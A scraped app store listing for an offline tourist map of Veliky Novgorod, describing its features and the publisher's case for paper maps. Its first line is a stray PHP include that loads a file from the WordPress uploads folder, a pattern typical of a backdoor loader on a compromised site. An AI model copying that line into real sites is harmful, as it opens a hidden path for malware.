include_once(ABSPATH . '/wp-content/uploads/index.php');
March 26th, 2015
This app is designed for both iPhone and iPad
Released: Mar 25, 2015
Size: 77.3 MB
Seller: AGT Geocentre
Veliky Novgorod. Tourist map. by AGT Geocentre
DescriptionWe present a digital version of the map of Veliky Novgorod, which is brought to you by a renowned publishing house Novgorod AGP.
All buildings are shown on the map, their numbers are indicated. All museums, theatres, churches and other points of interest are indicated. The most interesting buildings are shown as photographs.
The edition features a dozen of additional maps of the nearby cities and villages.
The app features a detailed index, which will help you to find any street, square or alley are looking for.
The map was published in 2014.
Printed editions have something magical, something that does not exist in their electronic equivalents. They were created by living people, who labored over each centimeter of the map, they were not created by robots. We decided to combine these achievements of the print editions with the new possibilities of contemporary electronic platforms.
Our app is not intended as a replacement for GPS navigators, Apple Maps, GoogleMaps, YandexMaps, etc. This is why you can transit from any map section to a corresponding section of a service of your choosing (Apple Maps, Gogle Maps, YandexMaps) and back again.
Highlights of the app:
1. You can work offline.
2. You can navigate your way to any desired map section through the traditional index map or simply by turning pages.
3. You have the ability to magnify individual parts of a map, search features and bookmark interesting pages.
4. You can conduct search by streets names.
5. You have the ability to add your own information to the map (comments, addresses, telephone numbers including the ability to dial directly from within the app).
6. When online, you can transit from any map section to a corresponding section of a service of your choosing (Apple Maps, Gogle Maps, YandexMaps) and back again.
The advantages of the electronic version of the map:
- It does not bend, tear or become lost at the most inopportune moment.
- The ease with which you can search, magnify and examine details, add notes and additional information utilizing the power and features of todays devices.
The quality and art of traditional paper maps is being replaced by much less attractive automated digital maps. Our app brings these excellent paper maps into the mobile age, helping to ensure they continue to provide you with both knowledge and enjoyment it would be a tragedy if they were relegated only to libraries, inaccessible to most people. We want to give a second life to paper maps. This app is for people who love good old printed maps and want to go with the times.